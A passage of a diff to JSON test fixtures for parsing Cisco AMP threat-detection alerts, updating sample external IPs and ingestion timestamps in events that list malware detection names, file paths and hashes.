Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196246\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -897,7 +897,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -944,7 +944,7 @@ "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -958,8 +958,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:30.174525813Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":225000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196245\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", + "ingested": "2021-12-09T13:35:36.337101500Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":225000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196245\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -981,7 +981,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -1028,7 +1028,7 @@ "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -1042,8 +1042,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:30.174527881Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":209000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196244\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", + "ingested": "2021-12-09T13:35:36.337107300Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":209000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196244\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -1065,7 +1065,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -1112,7 +1112,7 @@ "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -1126,8 +1126,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:30.174529896Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":178000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196243\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", + "ingested": "2021-12-09T13:35:36.337113Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":178000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196243\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -1149,7 +1149,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -1196,7 +1196,7 @@ "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -1210,8 +1210,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:30.174536354Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":147000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196242\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", + "ingested": "2021-12-09T13:35:36.337118800Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":147000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196242\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -1233,7 +1233,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -1280,7 +1280,7 @@ "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -1294,8 +1294,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:30.174538921Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":69000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196241\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", + "ingested": "2021-12-09T13:35:36.337124600Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":69000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196241\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -1317,7 +1317,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -1364,7 +1364,7 @@ "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -1378,8 +1378,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:30.174541191Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":69000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196240\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", + "ingested": "2021-12-09T13:35:36.337130600Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":69000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196240\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -1401,7 +1401,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -1448,7 +1448,7 @@ "ec80314ae4a2817be806b7ae27dbdb31a88226a0" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -1458,8 +1458,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:30.174543224Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176259080131183000,\"timestamp\":1610705857,\"timestamp_nanoseconds\":996000000,\"date\":\"2021-01-15T10:17:37+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176259080131182683\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}", + "ingested": "2021-12-09T13:35:36.337136400Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176259080131183000,\"timestamp\":1610705857,\"timestamp_nanoseconds\":996000000,\"date\":\"2021-01-15T10:17:37+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176259080131182683\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -1481,7 +1481,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -1528,7 +1528,7 @@ "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
